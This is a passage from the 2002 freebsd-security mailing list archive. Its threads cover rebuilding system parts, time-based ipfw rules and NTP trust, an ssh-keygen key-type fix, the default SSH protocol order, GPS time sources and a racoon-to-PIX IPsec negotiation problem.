directory > >*** Error code 1 > > > >Stop in /usr/src/bin/rmail. > >*** Error code 1 > > > >Stop in /usr/src/bin. > > Is this expected behavior? Yes. > Should you be able to rebuild the > system in this manner? Yes and no. No, you cannot expect to change to an arbitrary directory in /usr/src, type, 'make install' and expect it to work. But yes you can build parts of the system this way if you really know what you are doing. -- Crist J. Clark | cjclark@alum.mit.edu | cjclark@jhu.edu http://people.freebsd.org/~cjc/ | cjc@freebsd.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jul 5 13:19:42 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id A4BA637B400 for ; Fri, 5 Jul 2002 13:19:36 -0700 (PDT) Received: from natto.numachi.com (natto.numachi.com [198.175.254.216]) by mx1.FreeBSD.org (Postfix) with SMTP id C8B9D43E3B for ; Fri, 5 Jul 2002 13:19:35 -0700 (PDT) (envelope-from reichert@numachi.com) Received: (qmail 62060 invoked by uid 1001); 5 Jul 2002 20:19:34 -0000 Date: Fri, 5 Jul 2002 16:19:34 -0400 From: Brian Reichert To: Kim Okasawa Cc: _@r4k.net, freebsd-security@freebsd.org Subject: Re: Any security issues with root's cron job? Message-ID: <20020705161934.E259@numachi.com> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: ; from kimokasawa@hotmail.com on Sat, Jul 06, 2002 at 05:07:06AM +0900 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Sat, Jul 06, 2002 at 05:07:06AM +0900, Kim Okasawa wrote: > >From: Stephanie Wehner <_@r4k.net> > >To: Kim Okasawa > >Subject: Re: Any security issues with root's cron job? > >Date: Wed, 3 Jul 2002 16:48:37 +0200 > > > >Hi Kim, > > > > > Can anyone think of any potential security risks to such practice? > > >Any suggestions and comments are greatly appreciated. Thank you! > > > >Not from the cronjob directly, however why would you want to change > >your ipfw rule set according to time ? > > > >What I would check in this case is how your machine keeps time, > >eg it must be rather accurate. Also, by getting timing information > >from a remote ntp server for example would then mean you place your > >firewall rules pretty much into their hands. > > > > Hi Stephenie: > > Good thinking. You are absolutely right! The time should be rather > accurate in order for this to function correctly. How about letting the > server to run its ntp service? Clients who want to access to the server > would have to sync with it if necessary. But this means that the firewall > needs to open the ntp port and may create other problems. You don't _need_ a NTP server on your vault if you have access to one that you trust. I feel that most institutions should set up a peered set of stratum-3 servers, out of hand, and sync internal hosts to those; this cuts down on network traffic, if nothing else. (You could even force them to use your time server(s) via divert.) If your vault is to merely be an NTP client, then it will poll your time server(s); you can firewall out spoofed replies. If your time server is also to be a NTP server, then it will need to be able to serve requests from your LAN. These are both easily locked down via ipfw. > > What I want is to create a virtual timed vault that only allow the world to > access to certain services within a specific period of time. In my case, > some services/ports don't need to be available to the public from 8PM-8AM. > Closing those ports may mean less troubles. > > Any suggestion on how to deal with the ntp problem? Thanks. > > Best Regards, > Kim > > > _________________________________________________________________ > MSN Photos is the easiest way to share and print your photos: > http://photos.msn.com/support/worldwide.aspx > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- Brian 'you Bastard' Reichert 37 Crystal Ave. #303 Daytime number: (603) 434-6842 Derry NH 03038-1713 USA Intel architecture: the left-hand path To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jul 5 13:26:47 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 586A037B400; Fri, 5 Jul 2002 13:26:43 -0700 (PDT) Received: from sccrmhc01.attbi.com (sccrmhc01.attbi.com [204.127.202.61]) by mx1.FreeBSD.org (Postfix) with ESMTP id 965C143E09; Fri, 5 Jul 2002 13:26:42 -0700 (PDT) (envelope-from crist.clark@attbi.com) Received: from blossom.cjclark.org ([12.234.91.48]) by sccrmhc01.attbi.com (InterMail vM.4.01.03.27 201-229-121-127-20010626) with ESMTP id <20020705202641.GXGM29588.sccrmhc01.attbi.com@blossom.cjclark.org>; Fri, 5 Jul 2002 20:26:41 +0000 Received: from blossom.cjclark.org (localhost. [127.0.0.1]) by blossom.cjclark.org (8.12.3/8.12.3) with ESMTP id g65KQfJK018810; Fri, 5 Jul 2002 13:26:41 -0700 (PDT) (envelope-from crist.clark@attbi.com) Received: (from cjc@localhost) by blossom.cjclark.org (8.12.3/8.12.3/Submit) id g65KQe9X018809; Fri, 5 Jul 2002 13:26:40 -0700 (PDT) X-Authentication-Warning: blossom.cjclark.org: cjc set sender to crist.clark@attbi.com using -f Date: Fri, 5 Jul 2002 13:26:40 -0700 From: "Crist J. Clark" To: Michael Sharp Cc: freebsd-security@FreeBSD.ORG, freebsd-questions@FreeBSD.ORG Subject: Re: ssk-keygen Message-ID: <20020705132640.B17982@blossom.cjclark.org> Reply-To: "Crist J. Clark" References: <20020704013131.1f7a014f.freebsd@ec.rr.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <20020704013131.1f7a014f.freebsd@ec.rr.com>; from freebsd@ec.rr.com on Thu, Jul 04, 2002 at 01:31:31AM -0400 X-URL: http://people.freebsd.org/~cjc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, Jul 04, 2002 at 01:31:31AM -0400, Michael Sharp wrote: > I did a cvsup of RELENG_4 about 2 hours ago ( July 4th @ 12:05 am )and noticed the new openssh3.4p1 and pam.conf source so I decided to make world. On reboot, ssh-keygen fails to make RSA keys because in rc.network there is no -t rsa option when running ssh-keygen. ***I changed it*** and all is well. This is likely to come up on the questions and security list for those that did a cvsup at about the same time I did. I'm sure its been discovered and fixed by now. > > *** > if [ ! -f /etc/ssh/ssh_host_key ]; then > echo ' creating ssh RSA host key'; > /usr/bin/ssh-keygen -t rsa -N "" -f /etc/ssh/ssh_host_key > *** You told it to generate the wrong key. ssh_host_key should hold a protocol 1 key, /usr/bin/ssh-keygen -t rsa1 -N "" -f /etc/ssh/ssh_host_key ^ And yes, this has been fixed in RELENG_4. -- Crist J. Clark | cjclark@alum.mit.edu | cjclark@jhu.edu http://people.freebsd.org/~cjc/ | cjc@freebsd.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jul 5 18:58:30 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 2181737B400 for ; Fri, 5 Jul 2002 18:58:29 -0700 (PDT) Received: from mail.geek.sh (decoder.geek.sh [196.36.198.81]) by mx1.FreeBSD.org (Postfix) with ESMTP id DEC6743E09 for ; Fri, 5 Jul 2002 18:58:26 -0700 (PDT) (envelope-from aragon@geek.sh) Received: by mail.geek.sh (Postfix, from userid 1000) id 4D11424F1F; Sat, 6 Jul 2002 03:58:23 +0200 (SAST) Date: Sat, 6 Jul 2002 03:58:23 +0200 From: Aragon Gouveia To: security@freebsd.org Subject: Re: Default ssh protocol in -STABLE [was: HEADS UP: FreeBSD-STABLE now has OpenSSH 3.4p1] Message-ID: <20020706015823.GB7058@phat.za.net> Mail-Followup-To: security@freebsd.org References: <20020705073634.GA64656@sunbay.com> <20020705073634.GA64656@sunbay.com> <5.1.0.14.0.20020705073043.01c52198@192.168.0.12> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.4i X-Operating-System: FreeBSD 4.6-RC i386 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org | By Dag-Erling Smorgrav | [ 2002-07-05 14:02 +0200 ] > What do people think about this? Keep 2,1 or revert to 1,2? I think 2,1 is a good idea too. Regards, Aragon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jul 5 19:49: 6 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5A70C37B400; Fri, 5 Jul 2002 19:49:03 -0700 (PDT) Received: from lariat.org (lariat.org [63.229.157.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3EC1743E31; Fri, 5 Jul 2002 19:49:02 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id UAA29905; Fri, 5 Jul 2002 20:48:21 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020705204451.02607930@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Fri, 05 Jul 2002 20:48:15 -0600 To: thomas@cuivre.fr.eu.org, Dag-Erling Smorgrav From: Brett Glass Subject: Re: Default ssh protocol in -STABLE [was: HEADS UP: FreeBSD-STABLE now has OpenSSH 3.4p1] Cc: Mike Tancsa , Ruslan Ermilov , security@FreeBSD.ORG In-Reply-To: <20020705134934.A40046@melusine.cuivre.fr.eu.org> References: <20020705073634.GA64656@sunbay.com> <20020705073634.GA64656@sunbay.com> <5.1.0.14.0.20020705073043.01c52198@192.168.0.12> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 05:49 AM 7/5/2002, Thomas Quinot wrote: >Since the version change is going to suprise people anyway, I'd say let >us do it all the way and switch to protocol 2,1. It is more than time >to phase out protocol 1. Alas, too many clients use Protocol 1 only. And Protocol 1 really isn't that bad, security-wise! In fact, after the rash of recent bugs in code that's exclusively used by Protocol 2 (with, I suspect, more yet to be found), I've set quite a few servers that really only communicate with Protocol 1 clients to do Protocol 1 only. I may reconsider this move in a year or so, but for now it seems to be the safest way to go. --Brett Glass To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jul 5 20:29:22 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D33EA37B400 for ; Fri, 5 Jul 2002 20:29:16 -0700 (PDT) Received: from web10105.mail.yahoo.com (web10105.mail.yahoo.com [216.136.130.55]) by mx1.FreeBSD.org (Postfix) with SMTP id 940F543E09 for ; Fri, 5 Jul 2002 20:29:16 -0700 (PDT) (envelope-from twigles@yahoo.com) Message-ID: <20020706032916.35363.qmail@web10105.mail.yahoo.com> Received: from [68.5.49.41] by web10105.mail.yahoo.com via HTTP; Fri, 05 Jul 2002 20:29:16 PDT Date: Fri, 5 Jul 2002 20:29:16 -0700 (PDT) From: twig les Subject: NTP security - (was Any security issues with root's cron job?) To: Brian Reichert , Kim Okasawa Cc: _@r4k.net, freebsd-security@freebsd.org In-Reply-To: <20020705161934.E259@numachi.com> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The way we skirt the issue of having our own secure source is to get our border routers to poll a couple of servers on the internet and then the servers can poll them. There are a number of possible attacks on this, but we're not getting 20 grand for our own source anytime soon and at least this way we can pin-hole the access-lists. And since we're running beefy border routers, any DoS based on amount of traffic would be less likely to work. I'm open to ideas. --- Brian Reichert wrote: > On Sat, Jul 06, 2002 at 05:07:06AM +0900, Kim > Okasawa wrote: > > >From: Stephanie Wehner <_@r4k.net> > > >To: Kim Okasawa > > >Subject: Re: Any security issues with root's cron > job? > > >Date: Wed, 3 Jul 2002 16:48:37 +0200 > > > > > >Hi Kim, > > > > > > > Can anyone think of any potential security > risks to such practice? > > > >Any suggestions and comments are greatly > appreciated. Thank you! > > > > > >Not from the cronjob directly, however why would > you want to change > > >your ipfw rule set according to time ? > > > > > >What I would check in this case is how your > machine keeps time, > > >eg it must be rather accurate. Also, by getting > timing information > > >from a remote ntp server for example would then > mean you place your > > >firewall rules pretty much into their hands. > > > > > > > Hi Stephenie: > > > > Good thinking. You are absolutely right! The > time should be rather > > accurate in order for this to function correctly. > How about letting the > > server to run its ntp service? Clients who want > to access to the server > > would have to sync with it if necessary. But this > means that the firewall > > needs to open the ntp port and may create other > problems. > > You don't _need_ a NTP server on your vault if you > have access to > one that you trust. I feel that most institutions > should set up a > peered set of stratum-3 servers, out of hand, and > sync internal > hosts to those; this cuts down on network traffic, > if nothing else. > > (You could even force them to use your time > server(s) via divert.) > > If your vault is to merely be an NTP client, then it > will poll your > time server(s); you can firewall out spoofed > replies. > > If your time server is also to be a NTP server, then > it will need > to be able to serve requests from your LAN. > > These are both easily locked down via ipfw. > > > > > What I want is to create a virtual timed vault > that only allow the world to > > access to certain services within a specific > period of time. In my case, > > some services/ports don't need to be available to > the public from 8PM-8AM. > > Closing those ports may mean less troubles. > > > > Any suggestion on how to deal with the ntp > problem? Thanks. > > > > Best Regards, > > Kim > > > > > > > _________________________________________________________________ > > MSN Photos is the easiest way to share and print > your photos: > > http://photos.msn.com/support/worldwide.aspx > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of > the message > > > > -- > Brian 'you Bastard' Reichert > 37 Crystal Ave. #303 Daytime number: (603) > 434-6842 > Derry NH 03038-1713 USA Intel architecture: the > left-hand path > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of > the message ===== ----------------------------------------------------------- All warfare is based on deception. ----------------------------------------------------------- __________________________________________________ Do You Yahoo!? Sign up for SBC Yahoo! Dial - First Month Free http://sbc.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jul 5 21:23: 3 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id C029A37B400 for ; Fri, 5 Jul 2002 21:23:01 -0700 (PDT) Received: from giroc.albury.net.au (giroc.albury.NET.AU [203.15.244.13]) by mx1.FreeBSD.org (Postfix) with ESMTP id 30FCD43E31 for ; Fri, 5 Jul 2002 21:23:00 -0700 (PDT) (envelope-from rossw@albury.net.au) Received: from giroc.albury.net.au (giroc.albury.net.au [203.15.244.13]) by giroc.albury.net.au (8.11.1/8.11.1) with ESMTP id g663qEE16526; Sat, 6 Jul 2002 13:52:14 +1000 (EST) X-Delivered-To: freebsd-security@FreeBSD.ORG Date: Sat, 6 Jul 2002 13:52:13 +1000 (EST) From: Ross Wheeler To: twig les Cc: Brian Reichert , Kim Okasawa , <_@r4k.net>, Subject: Re: NTP security - (was Any security issues with root's cron job?) In-Reply-To: <20020706032916.35363.qmail@web10105.mail.yahoo.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > The way we skirt the issue of having our own secure > source is to get our border routers to poll a couple > of servers on the internet and then the servers can > poll them. There are a number of possible attacks on > this, but we're not getting 20 grand for our own > source anytime soon > I'm open to ideas. Whip over to ebay, buy a cheap second-hand GPS and cable, stick it into one of your servers and presto - instant "stratum 1" time reference for under a hundred bucks. Under your control (I can't see anyone taking over or DoSing the whole of the GPS network any time soon, do you?) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jul 5 21:41:44 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 6421C37B47B for ; Fri, 5 Jul 2002 21:41:35 -0700 (PDT) Received: from wrath.cs.utah.edu (wrath.cs.utah.edu [155.99.198.100]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8E63743E3B for ; Fri, 5 Jul 2002 21:41:34 -0700 (PDT) (envelope-from danderse@cs.utah.edu) Received: from famine.cs.utah.edu (famine.cs.utah.edu [155.99.198.114]) by wrath.cs.utah.edu (8.11.6/8.11.6) with ESMTP id g664fQD16545; Fri, 5 Jul 2002 22:41:26 -0600 (MDT) Received: by famine.cs.utah.edu (Postfix, from userid 2146) id 28D4323A77; Fri, 5 Jul 2002 22:41:26 -0600 (MDT) Date: Fri, 5 Jul 2002 22:41:26 -0600 From: "David G . Andersen" To: twig les Cc: Brian Reichert , Kim Okasawa , _@r4k.net, freebsd-security@FreeBSD.ORG Subject: Re: NTP security - (was Any security issues with root's cron job?) Message-ID: <20020705224126.A23004@cs.utah.edu> References: <20020705161934.E259@numachi.com> <20020706032916.35363.qmail@web10105.mail.yahoo.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: <20020706032916.35363.qmail@web10105.mail.yahoo.com>; from twigles@yahoo.com on Fri, Jul 05, 2002 at 08:29:16PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org twig les just mooed: > The way we skirt the issue of having our own secure > source is to get our border routers to poll a couple > of servers on the internet and then the servers can > poll them. There are a number of possible attacks on > this, but we're not getting 20 grand for our own > source anytime soon and at least this way we can > pin-hole the access-lists. And since we're running > beefy border routers, any DoS based on amount of > traffic would be less likely to work. > > I'm open to ideas. 20 grand? Fear that. If you go for a cheap-o solution, you can do it for ~$400. If you want a plug-and-go solution, I'd suggest: - For about $1000, buy a Praecis Ct from EndRun Technologies http://www.endruntechnologies.com/ I have about 15 of them deployed right now. They pick GPS time from the CDMA cellular network. You can get 10 microsecond time inside of most machine rooms, without an external antenna. (If your cell phone works there, this probably will). US only Emulates a Trimble Palisade, plays very well with ntpd, requires no kernel changes. - For less than that, buy an Oncore UT+ eval kit from Synergy GPS (http://www.synergy-gps.com/) You want the UT+, not the other models, because this one's optimized for timekeeping. Has all the features you'll want, plays well with ntpd. For best results, requires options PPS_SYNC Works worldwide, requires antenna placement with a decent view of the sky. Once it's found itself, though, the UT+ can keep time with very few satellites, a definite bonus. I have several of each of these in a "production" network (well, a production distributed testbed), and I really like them both. The UT+ took a bit more work to set up, but if you get one, send me a note, and I'll mail you the configuration stuff. It's really quite simple overall. The EndRun boxes simply kick butt for use in the US. With all of these, however, you'll still want to peer with some external timeservers as a sanity check. I've had one occurrence when the cellular network was broadcasting bad time. It was fixed within an hour of when I reported it (it breaks hand-off), and Verizon said it was the only one of their cellular towers that was off, but it does happen. If you're doubly paranoid, do said sanity checking with a source that'll do authentication with you. -Dave -- work: dga@lcs.mit.edu me: dga@pobox.com MIT Laboratory for Computer Science http://www.angio.net/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jul 5 21:44:19 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 53E5737B400 for ; Fri, 5 Jul 2002 21:44:17 -0700 (PDT) Received: from wrath.cs.utah.edu (wrath.cs.utah.edu [155.99.198.100]) by mx1.FreeBSD.org (Postfix) with ESMTP id AC7F243E09 for ; Fri, 5 Jul 2002 21:44:16 -0700 (PDT) (envelope-from danderse@cs.utah.edu) Received: from famine.cs.utah.edu (famine.cs.utah.edu [155.99.198.114]) by wrath.cs.utah.edu (8.11.6/8.11.6) with ESMTP id g664i7D16705; Fri, 5 Jul 2002 22:44:07 -0600 (MDT) Received: by famine.cs.utah.edu (Postfix, from userid 2146) id 0138A23A77; Fri, 5 Jul 2002 22:44:06 -0600 (MDT) Date: Fri, 5 Jul 2002 22:44:06 -0600 From: "David G . Andersen" To: Ross Wheeler Cc: twig les , Brian Reichert , Kim Okasawa , _@r4k.net, freebsd-security@FreeBSD.ORG Subject: Re: NTP security - (was Any security issues with root's cron job?) Message-ID: <20020705224406.B23004@cs.utah.edu> References: <20020706032916.35363.qmail@web10105.mail.yahoo.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: ; from rossw@albury.net.au on Sat, Jul 06, 2002 at 01:52:13PM +1000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Ross Wheeler just mooed: > > Whip over to ebay, buy a cheap second-hand GPS and cable, stick it into > one of your servers and presto - instant "stratum 1" time reference for One thing to note with this approach is that you have to pick your GPS carefully. Hand-helds often have really terrible time output; a friend of mine used his PCMCIA GPS and was getting worse-than-NTP time from it. If you can find it, look for a model that's optimized for time synch. Trimble, UT+, etc. There's a good list of them in the NTP faq at http://www.ntp.org/ > under a hundred bucks. Under your control (I can't see anyone taking over > or DoSing the whole of the GPS network any time soon, do you?) Certainly not to attack one internet site, at least. :) -Dave -- work: dga@lcs.mit.edu me: dga@pobox.com MIT Laboratory for Computer Science http://www.angio.net/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jul 6 4: 2:36 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 6C44137B400 for ; Sat, 6 Jul 2002 04:02:33 -0700 (PDT) Received: from walter.dfmm.org (walter.dfmm.org [209.151.233.240]) by mx1.FreeBSD.org (Postfix) with ESMTP id 028A343E31 for ; Sat, 6 Jul 2002 04:02:33 -0700 (PDT) (envelope-from jason@shalott.net) Received: (qmail 83702 invoked by uid 1000); 6 Jul 2002 11:02:27 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 6 Jul 2002 11:02:27 -0000 Date: Sat, 6 Jul 2002 04:02:27 -0700 (PDT) From: Jason Stone X-X-Sender: To: Subject: Re: Default ssh protocol in -STABLE [was: HEADS UP: FreeBSD-STABLE now has OpenSSH 3.4p1] In-Reply-To: Message-ID: <20020706035731.N2631-100000@walter> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 > > As a lot has changed with OpenSSH in FreeBSD, perhaps now is a good > > time to make the 2,1 the default instead ? > > I'd like that. I think the only reason for the old default was not to > surprise users who had the ssh1 RSA host key in their known_hosts but > not the ssh2 DSA host key. > > What do people think about this? Keep 2,1 or revert to 1,2? There is a whole lot of infrastructure surrounding ssh v1 keys out there, and it will all break if you change the default to v2. With the 5.0-RELEASE on the not-too-distant horizon, I really think it best to not change default behaviour within a major release. Keep the default as it is - don't break people. -Jason ----------------------------------------------------------------------- I worry about my child and the Internet all the time, even though she's too young to have logged on yet. Here's what I worry about. I worry that 10 or 15 years from now, she will come to me and say "Daddy, where were you when they took freedom of the press away from the Internet?" -- Mike Godwin -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: See https://private.idealab.com/public/jason/jason.gpg iD8DBQE9Js5DswXMWWtptckRAu+0AJ98Q69nm9ks4eAFls+MV+YwmU8u/QCgxnsz c4U9XMcfNuwCXvg2N9rd6fo= =EICy -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jul 6 6:21:29 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id C04DC37B406 for ; Sat, 6 Jul 2002 06:21:20 -0700 (PDT) Received: from kwiatek.eu.org (kwiatek.eu.org [193.110.123.48]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8F50043E4A for ; Sat, 6 Jul 2002 06:21:19 -0700 (PDT) (envelope-from kwiatek@tpi.pl) Received: from localhost (localhost [127.0.0.1]) by kwiatek.eu.org (Postfix) with ESMTP id 584CE32C55 for ; Sat, 6 Jul 2002 15:14:35 +0200 (CEST) Date: Sat, 6 Jul 2002 15:14:35 +0200 (CEST) From: Andrzej Kwiatkowski X-X-Sender: kwiatek@kwiatek.eu.org To: freebsd-security@freebsd.org Subject: subscribe freebsd-security Message-ID: <20020706151419.O80433-100000@kwiatek.eu.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org ---------- Andrzej Kwiatkowski tpinternet unix system administrator To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jul 6 7:51:44 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3BE9E37B401 for ; Sat, 6 Jul 2002 07:51:40 -0700 (PDT) Received: from fep3.cogeco.net (smtp.cogeco.net [216.221.81.25]) by mx1.FreeBSD.org (Postfix) with ESMTP id 761A543E09 for ; Sat, 6 Jul 2002 07:51:39 -0700 (PDT) (envelope-from dlavigne6@cogeco.ca) Received: from d226-33-213.home.cgocable.net (d226-33-213.home.cgocable.net [24.226.33.213]) by fep3.cogeco.net (Postfix) with ESMTP id C33C87546 for ; Sat, 6 Jul 2002 10:51:35 -0400 (EDT) Date: Sat, 6 Jul 2002 10:56:03 -0400 (EDT) From: Dru X-X-Sender: dlavigne6@x1-6-00-80-c8-3a-b8-46.kico2.on.cogeco.ca To: security@freebsd.org Subject: no phase2 handle found Message-ID: <20020706103414.X253-100000@x1-6-00-80-c8-3a-b8-46.kico2.on.cogeco.ca> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Didn't get any response from questions, so I'll try here. Trying to setup an IPSEC tunnel between a PIX 501 and FreeBSD 4.6 using the latest racoon. Phase 1 is successful and an ethereal analysis shows that both are negotiating the same policy parameters. However, Phase 2 repeats endlessly with this message in /var/log/racoon.conf: ERROR: isakmp_inf.c:776:isakmp_info_recv_n(): unknown notify message, no phase2 handle found. The Phase 2 parameters on the PIX: crypto ipsec transform-set vpn esp-des esp-md5-hmac crypto dynamic-map bsd 100 set transform-set vpn crypto dynamic-map bsd 100 set pfs group2 crypto dynamic-map bsd 100 set security-association lifetime seconds 3600 kilobytes 4608000 and in racoon: pfs_group 2; lifetime time 3600 sec; encryption_algorithm des ; authentication_algorithm hmac_md5; compression_algorithm deflate; I can only guess that negotiations are failing because of the compression algorithm; from what I can gather PIX only supports lzs but I'm unsure if compression is enabled or disabled by default. There are no (documented) knobs in the PIX IOS to enable/disable compression in the transform set. I haven't had any luck getting setkey to use lzs and a google search shows one mailing list query which never received an answer. If I try: add bsd_ip pix_ip 666 -C lzs; I get a syntax error. I've been able to set the SPD to accept this as part of the policy ipcomp/tunnel/pix_ip-bsd_ip/require; but that still doesn't tell it to use lsz. racoon.conf accepts the lsz keyword but that didn't help either. Any suggestions on where to go from here? Also, the manpage for tcpdump has a -E option that works if tcpdump was compiled with cryptography enabled. How do I do this? TIA, Dru To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jul 6 10:52:29 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 1C53737B400 for ; Sat, 6 Jul 2002 10:52:26 -0700 (PDT) Received: from bodb.mc.mpls.visi.com (bodb.mc.mpls.visi.com [208.42.156.104]) by mx1.FreeBSD.org (Postfix) with ESMTP id 9CC8743E09 for ; Sat, 6 Jul 2002 10:52:25 -0700 (PDT) (envelope-from hawkeyd@visi.com) Received: from sheol.localdomain (hawkeyd-fw.dsl.visi.com [208.42.101.193]) by bodb.mc.mpls.visi.com (Postfix) with ESMTP id A78995425; Sat, 6 Jul 2002 12:52:24 -0500 (CDT) Received: (from hawkeyd@localhost) by sheol.localdomain (8.11.6/8.11.6) id g66HqNX00351; Sat, 6 Jul 2002 12:52:23 